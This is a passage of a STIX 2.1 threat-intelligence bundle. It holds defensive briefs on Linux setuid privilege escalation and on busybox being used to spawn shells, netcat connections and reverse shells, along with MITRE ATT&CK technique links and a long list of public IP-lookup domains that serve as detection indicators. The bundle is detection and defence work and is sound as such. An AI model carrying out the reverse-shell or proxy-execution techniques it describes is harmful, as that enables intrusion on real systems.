user-writable directories followed by UID change indicates a high likelihood of malicious intent and could precede significant damage.\n\n## Recommendation\n\n*   Deploy the `Potential Linux Privilege Escalation via Suspicious Setuid Execution` Sigma rule to your SIEM to detect this activity.\n*   Ensure comprehensive endpoint logging for `process_creation` events on Linux systems, including `User`, `ParentUser`, and `Image` fields.\n*   Review process ancestry and execution context for any alerts generated by the `Potential Linux Privilege Escalation via Suspicious Setuid Execution` rule, specifically around UID transitions.\n*   Isolate any Linux hosts showing activity matching the `Potential Linux Privilege Escalation via Suspicious Setuid Execution` rule from the network to contain the threat.\n*   Harden your Linux environment by regularly auditing and removing unnecessary setuid programs, and mounting writable directories like `/tmp` and `/dev/shm` with `nosuid` and `noexec` flags where feasible.\n",
      "published": "2026-07-03T15:18:54Z",
      "labels": [
        "linux",
        "privilege-escalation",
        "endpoint",
        "threat-detection"
      ],
      "object_refs": [
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_potential_privesc_via_general_sequence_child.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94b601f0-2774-5673-aa0a-221598bb75a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0001c103-0344-5525-aa54-a8a8ba558d9f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--453b2fe2-dfe7-5e2f-bef8-b43a2be5212d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0001c103-0344-5525-aa54-a8a8ba558d9f",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--714d0fa1-bce7-5d1f-9607-2de8e31d588b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0001c103-0344-5525-aa54-a8a8ba558d9f",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0001c103-0344-5525-aa54-a8a8ba558d9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Command Execution via Busybox Proxy on Linux",
      "description": "## Overview\n\nThis threat brief focuses on a prevalent defense evasion technique observed on Linux environments, where the `busybox` utility is weaponized to execute arbitrary commands, spawn interactive shells, or establish network connections. Threat actors frequently utilize `busybox` due to its small footprint and presence on many embedded systems and container environments, allowing them to carry out malicious activities while attempting to circumvent traditional security monitoring. The described detection rule identifies instances where `busybox` is invoked with command-line arguments indicative of shell initiation, network utility usage (like `netcat` or `telnet`), or Python/PHP/Lua code for reverse shells or system commands. This activity is considered suspicious, particularly when originating from unusual file paths like temporary directories or user home directories, and is often a precursor to further compromise, data exfiltration, or persistence establishment. This technique is especially relevant for environments where `busybox` is commonly available but its usage for such activities is outside of normal operations.\n\n## Impact\n\nSuccessful exploitation using this technique can lead to various detrimental impacts, depending on the attacker's objectives. Initially, it grants the attacker remote code execution and potentially an interactive shell on the compromised Linux system. From there, adversaries can exfiltrate sensitive data, deploy additional malware (such as ransomware or cryptominers), establish persistence, or move laterally within the network. Although no specific victim count or targeted sector is detailed, any organization running Linux systems, especially those with vulnerable configurations or lax monitoring, is at risk. The primary damage stems from the initial foothold and the subsequent actions the attacker can take using a stealthy execution method.\n\n## Recommendation\n\n*   Deploy the Sigma rule included in this brief to your SIEM/EDR platform to detect suspicious `busybox` activity.\n*   Ensure process creation logging is enabled for all Linux endpoints, specifically capturing `CommandLine`, `Image`, `ParentImage`, and `ParentName` fields.\n*   Investigate all alerts generated by the \"Suspicious Command Execution via Busybox Proxy\" rule, focusing on the `CommandLine` arguments and the `ParentImage` path.\n*   Implement application control or allowlisting where feasible to restrict execution of `busybox` or other common utilities to only authorized processes and locations.\n*   Review the `falsepositives` section of the rule and tune it for your specific environment, particularly in containerized or development systems, while prioritizing detections from unknown or temporary directory parent processes.\n",
      "published": "2026-07-03T15:16:32Z",
      "labels": [
        "linux",
        "execution",
        "defense-evasion",
        "command-and-control",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_busybox_unusual_execution.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--93c78212-6ac4-5e48-b039-146f40fa1be3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip-api.com",
      "pattern": "[domain-name:value = 'ip-api.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e5702c3b-1405-551d-be0c-d7d510a83421",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--93c78212-6ac4-5e48-b039-146f40fa1be3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--522c50a1-09b9-573e-ae0b-8dc53836e945",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: checkip.dyndns.org",
      "pattern": "[domain-name:value = 'checkip.dyndns.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1946e3e2-29ad-5f86-b350-03820125d883",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--522c50a1-09b9-573e-ae0b-8dc53836e945"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--028f87db-68de-567d-bab6-4c69d730e4b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.ipify.org",
      "pattern": "[domain-name:value = 'api.ipify.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a5394418-8daf-507d-b884-f185c196c9e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--028f87db-68de-567d-bab6-4c69d730e4b9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--12e8c2ad-b4f7-5686-86da-d8f0a31ff70c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: whatismyip.akamai.com",
      "pattern": "[domain-name:value = 'whatismyip.akamai.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--941bc00d-e7fe-5454-a354-bad8b195dca0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--12e8c2ad-b4f7-5686-86da-d8f0a31ff70c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5dfb3465-e0ee-5fb8-8bc8-e0b265412580",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bot.whatismyipaddress.com",
      "pattern": "[domain-name:value = 'bot.whatismyipaddress.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dfe2ff8b-5245-5052-a69f-cfd9ceda43bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--5dfb3465-e0ee-5fb8-8bc8-e0b265412580"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fff93019-f541-5a45-be7b-9f503957a79c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ifcfg.me",
      "pattern": "[domain-name:value = 'ifcfg.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf96ebe9-e6b8-5ca5-85c6-7d2f3d716ffc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--fff93019-f541-5a45-be7b-9f503957a79c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5b38cbed-4435-5198-a72b-577c38414c48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ifconfig.me",
      "pattern": "[domain-name:value = 'ifconfig.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33404a9f-c670-5839-8108-c01fb59ad59b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--5b38cbed-4435-5198-a72b-577c38414c48"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4afc0d0a-e8af-52c6-b403-d8929df0b46f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ident.me",
      "pattern": "[domain-name:value = 'ident.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--038ac310-d413-519f-ba83-7eae4dacf0f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--4afc0d0a-e8af-52c6-b403-d8929df0b46f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5c5b03f-aa41-5d95-9faa-b4edda8a68f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipof.in",
      "pattern": "[domain-name:value = 'ipof.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27dd258c-acac-5664-97fa-887ac73ffa7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--e5c5b03f-aa41-5d95-9faa-b4edda8a68f5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b34f2c08-1f5d-5c87-bb21-df85a55c37ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip.tyk.nu",
      "pattern": "[domain-name:value = 'ip.tyk.nu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4ee2d1c-c4df-5699-bb8b-013604a88f45",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--b34f2c08-1f5d-5c87-bb21-df85a55c37ba"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a87bb25a-3cb6-5e89-b04e-fd12d68fc932",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: icanhazip.com",
      "pattern": "[domain-name:value = 'icanhazip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c27e26f9-99df-551b-af66-d42502818385",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--a87bb25a-3cb6-5e89-b04e-fd12d68fc932"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--13e4934a-ac51-59e5-b095-5dd06783dfb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: curlmyip.com",
      "pattern": "[domain-name:value = 'curlmyip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7ca3bda2-7590-53f1-99db-6265d274f722",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--13e4934a-ac51-59e5-b095-5dd06783dfb7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e96a9396-a32e-586e-bfc0-6b4957749fa7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: wgetip.com",
      "pattern": "[domain-name:value = 'wgetip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1e60d9d-76b4-5934-9b67-84c733e1826c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--e96a9396-a32e-586e-bfc0-6b4957749fa7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--21d09069-8552-59d1-ab61-c54b25055cee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: eth0.me",
      "pattern": "[domain-name:value = 'eth0.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84fd3234-385f-52dc-90b1-30f13c7e4e17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--21d09069-8552-59d1-ab61-c54b25055cee"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7765ba72-a77f-51ef-a051-abf970679868",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipecho.net",
      "pattern": "[domain-name:value = 'ipecho.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a494f230-70ec-59c8-893c-5bf25f3e9964",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--7765ba72-a77f-51ef-a051-abf970679868"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--23add069-81a7-527e-9e82-01201f4b4c95",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip.appspot.com",
      "pattern": "[domain-name:value = 'ip.appspot.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b6e309a5-45ad-5b31-9cbb-ffe17053d048",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--23add069-81a7-527e-9e82-01201f4b4c95"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4bfb9dc1-1dd4-5ed9-bf96-54d877adbf12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.myip.com",
      "pattern": "[domain-name:value = 'api.myip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b49377ef-0057-576c-9402-32aebc3f4384",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--4bfb9dc1-1dd4-5ed9-bf96-54d877adbf12"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--949257b7-98c6-5469-8fb0-a3cddbd5afb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: geoiptool.com",
      "pattern": "[domain-name:value = 'geoiptool.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9080cdc4-7485-5c4f-add6-573a47aa3d77",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--949257b7-98c6-5469-8fb0-a3cddbd5afb0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--70271514-9233-5f75-b895-872622020047",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.2ip.ua",
      "pattern": "[domain-name:value = 'api.2ip.ua']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0585cd0-eef3-5062-97e9-362f6ccb38d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--70271514-9233-5f75-b895-872622020047"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1aafff3d-6dde-5175-b00c-c69ba99bdfe2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.ip.sb",
      "pattern": "[domain-name:value = 'api.ip.sb']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05818877-1744-5216-9e8a-9a58b426ff16",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--1aafff3d-6dde-5175-b00c-c69ba99bdfe2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--61c1caed-26e0-5e86-b067-ea6c673fb88f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipinfo.io",
      "pattern": "[domain-name:value = 'ipinfo.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5bcbe6d9-550c-5ad0-8d4f-5734062928ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--61c1caed-26e0-5e86-b067-ea6c673fb88f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fc319f09-7c29-5253-9426-f34591018736",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: checkip.amazonaws.com",
      "pattern": "[domain-name:value = 'checkip.amazonaws.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8531a39-d419-5025-bc9d-879fe4e3cd2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--fc319f09-7c29-5253-9426-f34591018736"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--726ab160-0c6e-5d82-bd19-9023ec9755cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: wtfismyip.com",
      "pattern": "[domain-name:value = 'wtfismyip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4b18c008-5f2d-5047-a592-3d022a7676f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--726ab160-0c6e-5d82-bd19-9023ec9755cf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--378d1083-760c-5307-887f-260b223eaa33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: freegeoip.net",
      "pattern": "[domain-name:value = 'freegeoip.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34d96a37-3567-577d-b3cc-1253f6e3ceea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--378d1083-760c-5307-887f-260b223eaa33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a3a27661-a038-5572-a98b-82edb98143e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: freegeoip.app",
      "pattern": "[domain-name:value = 'freegeoip.app']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1369cd09-dc37-5867-b3db-dfbbf7163f4b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--a3a27661-a038-5572-a98b-82edb98143e5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--79958849-0f84-5b2d-bc58-fe25adb4dd00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: geoplugin.net",
      "pattern": "[domain-name:value = 'geoplugin.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8c6ecd0-7175-5692-8c1e-ba0282c2fd44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--79958849-0f84-5b2d-bc58-fe25adb4dd00"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9363cc16-5a81-5747-be9d-20b352ef1ef4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: myip.dnsomatic.com",
      "pattern": "[domain-name:value = 'myip.dnsomatic.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--59357f7f-1c40-5485-8d53-fb691aff643f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--9363cc16-5a81-5747-be9d-20b352ef1ef4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4d1fd378-8072-5745-a4aa-534737497987",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: www.geoplugin.net",
      "pattern": "[domain-name:value = 'www.geoplugin.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2f54a1c6-b38b-5903-8dc9-7989df140501",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--4d1fd378-8072-5745-a4aa-534737497987"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f96052aa-ef3c-5bf6-a458-e718f21ea6f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api64.ipify.org",
      "pattern": "[domain-name:value = 'api64.ipify.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2ab3eec4-94a3-5b17-8da7-c899dffbfb29",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--f96052aa-ef3c-5bf6-a458-e718f21ea6f1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41822fff-c0d7-50b6-96fc-42c7426f49a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip4.seeip.org",
      "pattern": "[domain-name:value = 'ip4.seeip.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfb10b61-18d0-5159-baf9-60bcfdc4e4be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--41822fff-c0d7-50b6-96fc-42c7426f49a1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fb503432-278e-5626-b3aa-d95d6735976c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: *.geojs.io",
      "pattern": "[domain-name:value = '*.geojs.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91e1c6f6-855d-59f1-ac37-115e4ca76968",
